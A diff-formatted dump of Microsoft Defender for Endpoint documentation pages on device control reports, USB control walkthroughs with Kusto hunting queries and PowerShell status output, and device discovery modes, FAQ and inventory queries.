-| extend MediaClassGuid = tostring(parsed.ClassGuid)
-| extend MediaClassName = tostring(parsed.ClassName)
-| extend MediaDeviceId = tostring(parsed.DeviceId)
-| extend MediaInstanceId = tostring(parsed.DeviceInstanceId)
-| extend MediaName = tostring(parsed.MediaName)
-| extend RemovableStoragePolicy = tostring(parsed.RemovableStoragePolicy)
-| extend MediaProductId = tostring(parsed.ProductId)
-| extend MediaVendorId = tostring(parsed.VendorId)
-| extend MediaSerialNumber = tostring(parsed.SerialNumber)
-|project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName, ActionType, RemovableStorageAccess, RemovableStoragePolicyVerdict, MediaBusType, MediaClassGuid, MediaClassName, MediaDeviceId, MediaInstanceId, MediaName, RemovableStoragePolicy, MediaProductId, MediaVendorId, MediaSerialNumber, FolderPath, FileSize
-| order by Timestamp desc
-
-```
-
-### Example 2: Removable storage file event
-
-When a RemovableStorageFileEvent action occurs, information about the evidence file is available for both printer protection and removable storage. Here's an example query you can use with advanced hunting:
-
-```kusto
-
-//information of the evidence file
-DeviceEvents
-| where ActionType contains "RemovableStorageFileEvent"
-| extend parsed=parse_json(AdditionalFields)
-| extend Policy = tostring(parsed.Policy)
-| extend PolicyRuleId = tostring(parsed.PolicyRuleId)
-| extend MediaClassName = tostring(parsed.ClassName)
-| extend MediaInstanceId = tostring(parsed.InstanceId)
-| extend MediaName = tostring(parsed.MediaName)
-| extend MediaProductId = tostring(parsed.ProductId)
-| extend MediaVendorId = tostring(parsed.VendorId)
-| extend MediaSerialNumber = tostring(parsed.SerialNumber)
-| extend FileInformationOperation = tostring(parsed.DuplicatedOperation)
-| extend FileEvidenceLocation = tostring(parsed.TargetFileLocation)
-| project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName, ActionType, Policy, PolicyRuleId, FileInformationOperation, MediaClassName, MediaInstanceId, MediaName, MediaProductId, MediaVendorId, MediaSerialNumber, FileName, FolderPath, FileSize, FileEvidenceLocation, AdditionalFields
-| order by Timestamp desc
-
-```
-
-## [**Device control report**](#tab/report)
-
-## Device control report
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-With the device control report, you can view events that relate to media usage. Such events include:
--- **Audit events:** Shows the number of audit events that occur when external media is connected.-- **Policy events:** Shows the number of policy events that occur when a device control policy is triggered.-
-> [!NOTE]
-> The audit event to track media usage is enabled by default for devices onboarded to Microsoft Defender for Endpoint.
-
-### Understanding the audit events
-
-The audit events include:
--- **USB drive mount and unmount:** Audit events that are generated when a USB drive is mounted or unmounted.-- **PnP:** Plug and Play audit events are generated when removable storage, a printer, or Bluetooth media is connected.-- **Removable storage access control:** Events are generated when a removable storage access control policy is triggered. It can be Audit, Block, or Allow.-
-### Monitor device control security
-
-Device control in Defender for Endpoint empowers security administrators with tools that enable them to track their organization's device control security through reports. You can find the device control report in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). Go to **Reports** > **Endpoints**. Find **Device control** card, and select the link to open the report.
-
-In the **Reports** dashboard, the **Device protection** card shows the number of audit events generated by media type, over the last 180 days. Under **View details**, raw events over the last 30 days are listed.
-
-The **View details** button shows more media usage data in the **Device control report** page.
-
-The page provides a dashboard with aggregated number of events per type and a list of events and shows 500 events per page, but if you're an administrator (such as a global administrator or security administrator), you can scroll down to see more events and can filter on time range, media class name, and device ID.
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/Detaileddevicecontrolreport.png" alt-text="The Device Control Report Details page in the Microsoft Defender portal" lightbox="media/Detaileddevicecontrolreport.png":::
-
-When you select an event, a flyout appears that shows you more information:
--- **General details:** Date, Action mode, the policy, and Access of this event.-- **Media information:** Media information includes Media name, Class name, Class GUID, Device ID, Vendor ID, Serial number, and Bus type.-- **Location details:** Device name, User, and MDATP device ID.-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/devicecontrolreportfilter.png" alt-text="The Filter On Device Control Report page" lightbox="media/devicecontrolreportfilter.png":::
-
-To see real-time activity for this media across the organization, select the **Open Advanced hunting** button. This includes an embedded, predefined query.
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/Devicecontrolreportquery.png" alt-text="The Query On Device Control Report page" lightbox="media/Devicecontrolreportquery.png":::
-
-To see the security of the device, select the **Open device page** button on the flyout. This button opens the device entity page.
-
-> [!div class="mx-imgBorder"]
-> :::image type="content" source="media/Devicesecuritypage.png" alt-text="The Device Entity Page" lightbox="media/Devicesecuritypage.png":::
-
-### Reporting delays
-
-There might be a delay of up to six hours from the time a media connection occurs to the time the event is reflected in the card or in the domain list.
-
-> [!NOTE]
-> When you export data, such as a list of events, from the device control report to Excel, up to 500 events are exported. However, if your organization is using Microsoft Sentinel, you can integrate Defender for Endpoint with Sentinel so that all incidents and alerts are streamed. For more information, see [Connect data from Microsoft Defender XDR to Microsoft Sentinel](/azure/sentinel/connect-microsoft-365-defender).
->
---
-## See also
--- [Device control in Microsoft Defender for Endpoint](device-control-overview.md)-- [Device Control for macOS](mac-device-control-overview.md)
security Device Control Walkthroughs https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-control-walkthroughs.md
- Title: Device control walkthroughs
-description: Learn how to work with device control in Defender for Endpoint.
--- Previously updated : 02/14/2024------ m365-security-- tier2-- mde-asr--- partner-contribution---
-# Device control walkthroughs
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-This article describes different ways to see how device control works. Beginning with default settings, each section describes how to configure device control to achieve certain objectives.
-
-## Explore the default state of device control
-
-By default, [device control](device-control-overview.md) is disabled and there are no restrictions on which devices can be added. The auditing of basic device control events is enabled for devices that are onboarded to Defender for Endpoint. This activity can be seen in the [device control report](device-control-report.md). Filtering on the built-in **PnP Audit Policy** shows devices that are connected to the endpoints in the environment.
-
-Device control in Defender for Endpoint identifies a device based on its properties. Device properties are visible by selecting an entry in the report.
-
-The **Device ID**, **Vendor ID** (VID), **Serial number**, and **Bus type** can all be used to identify a device (see [Device control policies in Microsoft Defender for Endpoint](device-control-policies.mddata is also available in [advanced hunting](../defender/advanced-hunting-overview.md), by searching for the `Plug and Play Device Connected action` (`PnPDeviceConnected`), as shown in the following example query:
-
-```kusto
-
-DeviceEvents
-| where ActionType == "PnpDeviceConnected"
-| extend parsed=parse_json(AdditionalFields)
-| extend MediaClass = tostring(parsed.ClassName)
-| extend MediaDeviceId = tostring(parsed.DeviceId)
-| extend MediaDescription = tostring(parsed.DeviceDescription)
-| extend MediaSerialNumber = tostring(parsed.SerialNumber)
-| project Timestamp, DeviceId, DeviceName, AccountName, AccountDomain, MediaClass, MediaDeviceId, MediaDescription, MediaSerialNumber, parsed
-| order by Timestamp desc
-
-```
-
-The status of device control (enabled/disabled, default enforcement, and last policy update) is available on a device via [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus), as illustrated in the following snippet:
-
-```powershell
-
-DeviceControlDefaultEnforcement :
-DeviceControlPoliciesLastUpdated : 1/3/2024 12:51:56 PM
-DeviceControlState : Disabled
-
-```
-
-Change the device control state to be enabled* on a test device. Make sure the policy is applied by checking [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus), as illustrated in the following snippet:
-
-```powershell
-
-DeviceControlDefaultEnforcement : DefaultAllow
-DeviceControlPoliciesLastUpdated : 1/4/2024 10:27:06 AM
-DeviceControlState : Enabled
-
-```
-
-In the test device, insert a USB drive. There are no restrictions; all types of access (read, write, execute, and print) are allowed. A record is created to show that a USB device was connected. You can use the following example advanced hunting query to see it:
-
-```kusto
-
-DeviceEvents
-| where ActionType == "PnpDeviceConnected"
-| extend parsed=parse_json(AdditionalFields)
-| extend MediaClass = tostring(parsed.ClassName)
-| extend MediaDeviceId = tostring(parsed.DeviceId)
-| extend MediaDescription = tostring(parsed.DeviceDescription)
-| extend MediaSerialNumber = tostring(parsed.SerialNumber)
-| where MediaClass == "USB"
-| project Timestamp, DeviceId, DeviceName, AccountName, AccountDomain, MediaClass, MediaDeviceId, MediaDescription, MediaSerialNumber, parsed
-| order by Timestamp desc
-
-```
-
-This example query filters the events by `MediaClass`. The default behavior can be changed to deny all devices, or to exclude families of devices from device control. Change the default behavior to deny, and then set device control only to apply to removable storage.
-
-For Intune, use a custom profile to set the device control settings, as follows:
--- Set `./Vendor/MSFT/Defender/Configuration/DeviceControlEnabled` to `1`-- Set `./Vendor/MSFT/Defender/Configuration/DefaultEnforcement` to `2` -- Set `./Vendor/MSFT/Defender/Configuration/SecuredDevicesConfiguration` to `RemovableMediaDevices`-
-Deploy your policy to the test device. Use [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) to confirm that the default enforcement is set to Deny, as illustrated in the following snippet:
-
-```powershell
-
-DeviceControlDefaultEnforcement : DefaultDeny
-DeviceControlPoliciesLastUpdated : 1/4/2024 10:27:06 AM
-DeviceControlState : Enabled
-
-```
-
-Remove, and reinsert the USB device in the test machine. Try to open the drive. The drive isn't accessible, and a message appears which indicates that access is denied.
-
-> [!NOTE]
-> Samples and instructions and examples are available [here](https://github.com/microsoft/mdatp-devicecontrol/blob/main/README.md).
-
-## Step 1: Deny all removable media
-
-In order to customize the behavior, device control uses policies that are a combination of groups and rules. Start by deploying a policy that denies all access to all removable storage devices, and audits the event by sending a notification to the portal and the user. The following image summarizes these settings:
--
-For the purposes of controlling access, devices are organized into Groups. This policy uses a group called `All removable media devices`. Once this policy is deployed to the test device, reinsert the USB. A notification appears, indicating that device access is restricted.
-
-The event also appears within 15 minutes in advanced hunting. You can use the following example query to view the results:
-
-```kusto
-
-DeviceEvents
-| where ActionType == "RemovableStoragePolicyTriggered"
-| extend parsed=parse_json(AdditionalFields)
-| extend RemovableStorageAccess = tostring(parsed.RemovableStorageAccess)
-| extend RemovableStoragePolicyVerdict = tostring(parsed.RemovableStoragePolicyVerdict)
-| extend MediaBusType = tostring(parsed.BusType)
-| extend MediaClassGuid = tostring(parsed.ClassGuid)
-| extend MediaClassName = tostring(parsed.ClassName)
-| extend MediaDeviceId = tostring(parsed.DeviceId)
-| extend MediaInstanceId = tostring(parsed.DeviceInstanceId)
-| extend MediaName = tostring(parsed.MediaName)
-| extend RemovableStoragePolicy = tostring(parsed.RemovableStoragePolicy)
-| extend MediaProductId = tostring(parsed.ProductId)
-| extend MediaVendorId = tostring(parsed.VendorId)
-| extend MediaSerialNumber = tostring(parsed.SerialNumber)
-|project Timestamp, DeviceId, DeviceName, InitiatingProcessAccountName, ActionType, RemovableStorageAccess, RemovableStoragePolicyVerdict, MediaBusType, MediaClassGuid, MediaClassName, MediaDeviceId, MediaInstanceId, MediaName, RemovableStoragePolicy, MediaProductId, MediaVendorId, MediaSerialNumber, FolderPath, FileSize
-| order by Timestamp desc
-
-```
-
-> [!NOTE]
-> You can view up to 300 events per device per day with advanced hunting.
->
-
-Selecting the event to view information about the policy and the device.
-
-## Step 2: Allow access for authorized USB devices
-
-To grant access to set of authorized USBs devices, set up a group to identify those devices. We call our group `Authorized USBs`, and used the settings depicted in the following image:
--
-In our example, the authorized USBs group contains a single device identified by its `InstancePathId`. Before deploying the sample, you can change the value to the `InstancePathId` for a test device. See [Using Windows Device Manager to determine device properties](device-control-policies.md#using-windows-device-manager-to-determine-device-properties) and [Using reports and advanced hunting](device-control-policies.md#using-reports-and-advanced-hunting-to-determine-properties-of-devices) to determine properties of devices for details on how to find the correct value.
-
-Notice that the authorized USB group is excluded from the deny-all policy. This ensures that those devices are evaluated for the other policies. Policies aren't evaluated in order, so each policy should be correct if evaluated independently. Once the policy is deployed, reinsert the approved USB device. You should see that there's full access to the device. Insert another USB, and confirm that access is blocked for that device.
-
-Device control has lots of ways to group devices based on properties. For more information, see [Device control policies in Microsoft Defender for Endpoint](device-control-policies.md).
-
-## Step 3: Allow different levels of access for different types of devices
-
-To create different behaviors for different devices, place them into separate groups. In our example, we use a group called `Read Only USBs`. The following image shows the settings we used:
--
-In our example, the Read Only USB group contains a single device identified by its `VID_PID`. Before deploying the sample, you can change the value of `VID_PID` to that of a second test device.
-
-Once the policy is deployed, insert an authorized USB. You should see that full access is allowed. Now insert the second test device (Read Only USB). You can access the device with read-only permissions. Attempt to create a new file, or make changes to a file, and you should see that device control blocks it.
-
-If you insert any other USB device, it should be blocked due to the "Deny all other USBs" policy.
-
-## Step 4: Allow different levels of access to devices for specific users or groups
-
-Device control allows you to further restrict access using conditions. The simplest condition is a user condition. In device control, users and groups are identified by their Security Identified (SID).
-
-The following screenshot shows the settings we used for our example:
--
-By default, the sample uses the Global SID of `S-1-1-0`. Before deploying the policy, you can change the SID associated with the authorized USBs (writeable USBs) to `User1` and change the SID associated with the Read Only USBs to `User2`.
-
-Once the policy is deployed, only User 1 has write access to the Authorized USBs, and only User 2 has read access to the ReadOnly USBs.
-
-Device control also supports group SIDs. Change the SID in the read-only policy to a group that contains `User2`. Once the policy is redeployed, the rules are the same for User 2 or any other user in that group.
-
-> [!NOTE]
-> For groups that are stored in Microsoft Entra, use the object id instead of the SID to identify groups of users.
-
-## Next steps
--- [Understand Device control policies](device-control-policies.md)-- [Deploy and manage device control with Intune](device-control-deploy-manage-intune.md)-- [Deploy and manage device control with Group Policy](device-control-deploy-manage-gpo.md)-- [View device control reports](device-control-report.md)
security Device Discovery Faq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-discovery-faq.md
- Title: Device discovery frequently asked questions
-description: Find answers to frequently asked questions (FAQs) about device discovery
--- NOCSH------ m365-security-- tier3- Previously updated : 03/23/2021--
-# Device discovery frequently asked questions
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-Find answers to frequently asked questions (FAQs) about device discovery.
-
-## What is Basic discovery mode?
-
-This mode allows every Microsoft Defender for Endpoint onboarded device to collect network data and discover neighboring devices. Onboarded endpoints passively collect events in the network and extract device information from them. No network traffic is initiated. Onboarded endpoints extract data from every network traffic that is seen by an onboarded device. This data used to list unmanaged devices in your network.
-
-## Can I disable Basic discovery?
-
-You have the option to turn off device discovery through the [Advanced features](advanced-features.md) page. However, you'll lose visibility on unmanaged devices in your network. Note that even if device discovery is turned off, SenseNDR.exe will still be running on the onboarded devices.
-
-## What is Standard discovery mode?
-
-In this mode, endpoints onboarded to Microsoft Defender for Endpoint can actively probe observed devices in the network to enrich collected data (with negligible amount of network traffic). Only devices that were observed by the basic discovery mode are actively probed in standard mode. This mode is highly recommended for building a reliable and coherent device inventory. If you choose to disable this mode, and select Basic discovery mode, you'll likely only gain limited visibility of unmanaged endpoints in your network.
-
- Standard mode also leverages common discovery protocols that use multicast queries in the network to find even more devices, in addition to the ones that were observed using the passive method.
-
-## Can I control which devices perform Standard discovery?
-
-You can customize the list of devices that are used to perform Standard discovery. You can either enable Standard discovery on all the onboarded devices that also support this capability (currently Windows 10 or later and Windows Server 2019 or later devices only) or select a subset or subsets of your devices by specifying their device tags. In this case, all other devices are configured to run Basic discovery only. The configuration is available in the device discovery settings page.
-
-## Can I exclude unmanaged devices from the device inventory list?
-
-Yes, you can apply filters to exclude unmanaged devices from the device inventory list. You can also use the onboarding status column on API queries to filter out unmanaged devices.
-
-## Which onboarded devices can perform discovery?
-
-Onboarded devices running on Windows 10 version 1809 or later, Windows 11, Windows Server 2019, or Windows Server 2022 can perform discovery.
-
-## What happens if my onboarded devices is connected to my home network, or to public access point?
-
-The discovery engine distinguishes between network events that are received in the corporate network versus outside of the corporate network. By correlating network identifiers across all tenant's clients, events are differentiated between ones that were received from private networks and corporate networks. For example, if most devices in the organization report that they're connected to the same network name, with the same default gateway and DHCP server address, it can be assumed that this network is likely a corporate network. Private network devices won't be listed in the inventory and won't be actively probed.
-
-## What protocols are you capturing and analyzing?
-
-By default, all onboarded devices running on Windows 10 version 1809 or later, Windows 11, Windows Server 2019, or Windows Server 2022 are capturing and analyzing the following protocols:
-ARP, CDP, DHCP, DHCPv6, IP (headers), LLDP, LLMNR, mDNS, MNDP, MSSQL, NBNS, SSDP, TCP (SYN headers), UDP (headers), WSD
-
-## Which protocols do you use for active probing in Standard discovery?
-When a device is configured to run Standard discovery, exposed services are being probed by using the following protocols:
-ARP, FTP, HTTP, HTTPS, ICMP, LLMNR, NBNS, RDP, SIP, SMTP, SNMP, SSH, Telnet, UPNP, WSD, SMB, NBSS, IPP, PJL, RPC, mDNS, DHCP, AFP, CrestonCIP, IphoneSync, WinRM, VNC, SLP, LDAP
-
-In addition, device discovery might also scan other commonly used ports to improve classification accuracy & coverage.
-
-## How can I exclude targets from being probed with Standard discovery?
-
-If there are devices on your network, which shouldn't be actively probed, you can also define a list of exclusions to prevent them from being scanned. The configuration is available in the device discovery settings page.
-
-> [!NOTE]
-> Devices might still reply to multicast discovery attempts in the network. Those devices will be discovered but won't be actively probed.
-
-## Can I exclude devices from being discovered?
-
-As device discovery uses passive methods to discover devices in the network, any device that communicates with your onboarded devices in the corporate network can be discovered and listed in the inventory. You can exclude devices from active probing only.
-
-## How frequent is the active probing?
-
-Devices will actively be probed when changes in device characteristics are observed to make sure the existing information is up to date (typically, devices probed no more than once in a three-week period)
-
-## My security tool raised alert on UnicastScanner.ps1 / PSScript_{GUID}.ps1 or port scanning activity initiated by it, what should I do?
-
-The active probing scripts are signed by Microsoft and are safe. You can add the following path to your exclusion list:
-`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Downloads\*.ps1`
-
-## What is the amount of traffic being generated by the Standard discovery active probe?
-
-Active probing can generate up to 50Kb of traffic between the onboarded device and the probed device, every probing attempt
-
-## Why is there a discrepancy between "can be onboarded" devices in the device inventory, and the number of "devices to onboard" in the dashboard tile?
-
-You may notice differences between the number of listed devices under "can be onboarded" in the device inventory, "onboard to Microsoft Defender for Endpoint" security recommendation, and "devices to onboard" dashboard widget.
-
- The security recommendation and the dashboard widget are for devices that are stable in the network; excluding ephemeral devices, guest devices and others. The idea is to recommend on persistent devices that also imply on the overall security score of the organization.
-
-## Can I onboard unmanaged devices that were found?
-
-Yes. You can onboard unmanaged devices manually. Unmanaged endpoints in your network introduce vulnerabilities and risks to your network. Onboarding them to the service can increase the security visibility on them.
-
-## I've noticed that unmanaged device health state is always "Active", why is that?
-
-Temporarily, unmanaged device health state is "Active" during the standard retention period of the device inventory, regardless of their actual state.
-
-## Does standard discovery look like malicious network activity?
-
-When considering Standard discovery, you may be wondering about the implications of probing, and specifically whether security tools might suspect such activity as malicious. The following subsection explains why, in almost all cases, organizations should have no concerns around enabling Standard discovery.
-
-### Probing is distributed across all Windows devices on the network
-
-As opposed to malicious activity, which would typically scan the entire network from a few compromised devices, Microsoft Defender for Endpoint's Standard discovery probing is initiated from all onboarded Windows devices making the activity benign and non-anomalous. The probing is centrally managed from the cloud to balance the probing attempt between all the supported onboarded devices in the network.
-
-### Active probing generates negligible amount of extra traffic
-
-Unmanaged devices would typically get probed no more than once in a three-week period and generate less than 50KB of traffic. Malicious activity usually includes high repetitive probing attempts and in some cases data exfiltration that generates a significant amount of network traffic that can be identified as an anomaly by network monitoring tools.
-
-### Your Windows device already runs active discovery
-
-Active discovery capabilities have always been embedded in the Windows operating system, to find nearby devices, endpoints, and printers, for easier "plug and play" experiences and file sharing between endpoints in the network. Similar functionality is implemented in mobile devices, network equipment and inventory applications just to name a few.
-
-Standard discovery uses the same discovery methods to identify devices and to have a unified visibility for all the devices in your network in the Microsoft Defender XDR Device Inventory. For example ΓÇô Standard discovery identifies nearby endpoints in the network the same way Windows lists available printers in the network.
-
-Network security and monitoring tools are indifferent to such activities performed by devices on the network.
-
-### Only unmanaged devices are being probed
-
-The device discovery capabilities have been built to only discover and identify unmanaged devices on your network. This means that previously discovered devices that are already onboarded with Microsoft Defender for Endpoint won't be probed.
-
-### You can exclude network lures from active probing
-
-Standard discovery supports exclusion of devices or ranges (subnets) from active probing. If you have network lures deployed in place, you can use the Device Discovery settings to define exclusions based on IP addresses or subnets (a range of IP addresses). Defining those exclusions ensure that those devices won't be actively probed and won't be alerted. Those devices are discovered using passive methods only (similar to Basic discovery mode).
security Device Discovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-discovery.md
- Title: Device discovery overview
-description: Learn how to use endpoint discovery in Microsoft Defender XDR to find unmanaged devices in your network.
--- NOCSH------ m365-security-- m365initiative-m365-defender-- m365-initiative-defender-endpoint-- tier1-- Previously updated : 04/03/2024--
-# Device discovery overview
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Protecting your environment requires taking inventory of the devices that are in your network. However, mapping devices in a network can often be expensive, challenging, and time-consuming.
-
-Microsoft Defender for Endpoint provides a device discovery capability that helps you find unmanaged devices connected to your corporate network without the need for extra appliances or cumbersome process changes. Device discovery uses onboarded endpoints, in your network to collect, probe, or scan your network to discover unmanaged devices. The device discovery capability allows you to discover:
--- Enterprise endpoints (workstations, servers, and mobile devices) that aren't yet onboarded to Defender for Endpoint-- Network devices like routers and switches-- IoT devices like printers and cameras-
-Unknown and unmanaged devices introduce significant risks to your network - whether it's an unpatched printer, network devices with weak security configurations, or a server with no security controls. Once devices are discovered, you can:
--- Onboard unmanaged endpoints to the service, increasing the security visibility on them.-- Reduce the attack surface by identifying and assessing vulnerabilities, and detecting configuration gaps.-
-Watch this video for a quick overview of how to assess and onboard unmanaged devices that Defender for Endpoint discovered.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4RwQz]
-
-With this capability, a security recommendation to onboard devices to Defender for Endpoint is available as part of the existing Microsoft Defender Vulnerability Management experience.
-
-## Discovery methods
-
-You can choose the discovery mode to be used by your onboarded devices. The mode controls the level of visibility you can get for unmanaged devices in your corporate network.
-
-There are two modes of discovery available:
--- **Basic discovery**: In this mode, endpoints passively collect events in your network and extract device information from them. Basic discovery uses the SenseNDR.exe binary for passive network data collection and no network traffic is initiated. Endpoints extract data from all network traffic seen by an onboarded device. With basic discovery, you only gain limited visibility of unmanaged endpoints in your network.--- **Standard discovery** (recommended): This mode allows endpoints to actively find devices in your network to enrich collected data and discover more devices - helping you build a reliable and coherent device inventory. In addition to devices that were observed using the passive method, standard mode also uses common discovery protocols that use multicast queries in the network to find even more devices. Standard mode uses smart, active probing to discover additional information about observed devices to enrich existing device information. When Standard mode is enabled, minimal and negligible network activity generated by the discovery sensor might be observed by network monitoring tools in your organization.-
-You can change and customize your discovery settings, for more information, see [Configure device discovery](configure-device-discovery.md).
-
-> [!IMPORTANT]
-> Standard discovery is the default mode for all customers starting July 19, 2021. You can choose to change this configuration to basic through the settings page. If you choose basic mode, you'll only gain limited visibility of unmanaged endpoints in your network.
-
-The discovery engine distinguishes between network events that are received in the corporate network versus outside of the corporate network. Devices that aren't connected to corporate networks won't be discovered or listed in the device inventory.
-
-## Device inventory
-
-Devices that were discovered but aren't onboarded to and secured by Defender for Endpoint are listed in the device inventory.
-
-To assess these devices, you can use a filter in the device inventory list called **Onboarding status**, which can have any of the following values:
--- **Onboarded**: The endpoint is onboarded to Defender for Endpoint.-- **Can be onboarded**: The endpoint was discovered in the network and the Operating System was identified as one that is supported by Defender for Endpoint, but it isn't currently onboarded. We highly recommend onboarding these devices.-- **Unsupported**: The endpoint was discovered in the network but isn't supported by Defender for Endpoint.-- **Insufficient info**: The system couldn't determine the supportability of the device. Enabling standard discovery on more devices in the network can enrich the discovered attributes.--
-> [!TIP]
-> You can always apply filters to exclude unmanaged devices from the device inventory list. You can also use the onboarding status column on API queries to filter out unmanaged devices.
-
-For more information, see [Device inventory](machines-view-overview.md).
-
-## Network device discovery
-
-The large number of unmanaged network devices deployed in an organization creates a large surface area of attack, and represents a significant risk to the entire enterprise. Defender for Endpoint network discovery capabilities helps you ensure network devices are discovered, accurately classified, and added to the asset inventory.
-
-Network devices aren't managed as standard endpoints, as Defender for Endpoint doesn't have a sensor built into the network devices themselves. These types of devices require an agentless approach where a remote scan obtains the necessary information from the devices. To do this, a designated Defender for Endpoint device is used on each network segment to perform periodic authenticated scans of preconfigured network devices. Defender for Endpoint's vulnerability management capabilities provide integrated workflows to secure discovered switches, routers, WLAN controllers, firewalls, and VPN gateways.
-
-For more information, see [Network devices](network-devices.md).
-
-## Device discovery Integration
-
-To address the challenge of gaining enough visibility to locate, identify, and secure your complete OT/IOT asset inventory Defender for Endpoint now supports the following integration:
--- **Microsoft Defender for IoT**: This integration combines Defender for Endpoint's device discovery capabilities, with the agentless monitoring capabilities of Microsoft Defender for IoT, to secure enterprise IoT devices connected to an IT network (for example, Voice over Internet Protocol (VoIP), printers, and smart TVs). For more information, see [Enable Enterprise IoT security with Defender for Endpoint](/azure/defender-for-iot/organizations/eiot-defender-for-endpoint/).-
-## Vulnerability assessment on discovered devices
-
-Vulnerabilities and risks on your devices as well as other discovered unmanaged devices in the network are part of the current Defender Vulnerability Management flows under "Security Recommendations" and represented in entity pages across the portal.
-Search for "SSH" related security recommendations to find SSH vulnerabilities that are related for unmanaged and managed devices.
--
-## Use advanced hunting on discovered devices
-
-You can use advanced hunting queries to gain visibility on discovered devices. Find details about discovered devices in the DeviceInfo table, or network-related information about those devices, in the DeviceNetworkInfo table.
--
-### Query discovered devices details
-
-Run this query on the DeviceInfo table to return all discovered devices along with the most up-to-date details for each device:
-
-```query
-DeviceInfo
-| summarize arg_max(Timestamp, *) by DeviceId // Get latest known good per device Id
-| where isempty(MergedToDeviceId) // Remove invalidated/merged devices
-| where OnboardingStatus != "Onboarded"
-```
-
-By invoking the **SeenBy** function, in your advanced hunting query, you can get detail on which onboarded device a discovered device was seen by. This information can help determine the network location of each discovered device and subsequently, help to identify it in the network.
-
-```query
-DeviceInfo
-| where OnboardingStatus != "Onboarded"
-| summarize arg_max(Timestamp, *) by DeviceId
-| where isempty(MergedToDeviceId)
-| limit 100
-| invoke SeenBy()
-| project DeviceId, DeviceName, DeviceType, SeenBy
-```
-
-For more information, see the [SeenBy()](/microsoft-365/security/defender/advanced-hunting-seenby-function) function.
-
-### Query network related information
-
-Device discovery leverages Defender for Endpoint onboarded devices as a network data source to attribute activities to non-onboarded devices. The network sensor on the Defender for Endpoint onboarded device identifies two new connection types:
--- ConnectionAttempt - An attempt to establish a TCP connection (syn)-- ConnectionAcknowledged - An acknowledgment that a TCP connection was accepted (syn\ack)-
-This means that when a non-onboarded device attempts to communicate with an onboarded Defender for Endpoint device, the attempt generates a DeviceNetworkEvent and the non-onboarded device activities can be seen on the onboarded device timeline, and through the Advanced hunting DeviceNetworkEvents table.
-
-You can try this example query:
-
-```text
-DeviceNetworkEvents
-| where ActionType == "ConnectionAcknowledged" or ActionType == "ConnectionAttempt"
-| take 10
-```
-
-## Next steps
--- [Configure device discovery](configure-device-discovery.md)-- [Device discovery FAQs](device-discovery-faq.md)-
security Device Health Microsoft Defender Antivirus Health https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-microsoft-defender-antivirus-health.md
- Title: Device health Microsoft Defender Antivirus health report
-description: Use the Microsoft Defender Antivirus report to track antivirus status and Microsoft Defender Antivirus engine, intelligence, and platform versions.
---
-localization_priority: Normal
Previously updated : 02/18/2024---- m365-security-- tier2-- mde-ngp-----
-# Device health, Microsoft Defender Antivirus health report
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-The Device Health report provides information about the devices in your organization. The report includes trending information showing the antivirus status and Microsoft Defender Antivirus engine, intelligence, and platform versions.
-
-> [!IMPORTANT]
-> For devices to appear in Microsoft Defender Antivirus device health reports they must meet the following pre-requisites:
->
-> - Device is onboarded to Microsoft Defender for Endpoint
-> - OS: Windows 10, Windows 11, Windows Server 2012 R2/, 2016 R2/ 2019/2022 (non MMA), MacOS, Linux
-> - Sense (MsSense.exe): **10.8210.** \*+. See [Prerequisites](#prerequisites) section for related details.
->
-> For Windows&nbsp;Server&nbsp;2012&nbsp;R2 and Windows&nbsp;Server&nbsp;2016 to appear in device health reports, these devices must be onboarded using the modern unified solution package. For more information, see [New functionality in the modern unified solution for Windows Server 2012 R2 and 2016](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution).
-
